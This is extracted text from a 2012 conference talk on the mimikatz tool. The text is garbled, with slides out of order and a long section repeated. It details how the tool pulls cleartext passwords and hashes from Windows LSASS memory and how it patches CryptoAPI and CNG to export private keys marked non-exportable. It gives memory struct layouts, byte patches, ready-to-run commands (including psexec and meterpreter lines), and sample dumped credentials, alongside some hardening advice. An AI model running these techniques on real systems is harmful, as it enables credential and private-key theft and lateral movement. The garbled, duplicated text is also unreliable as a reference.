lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
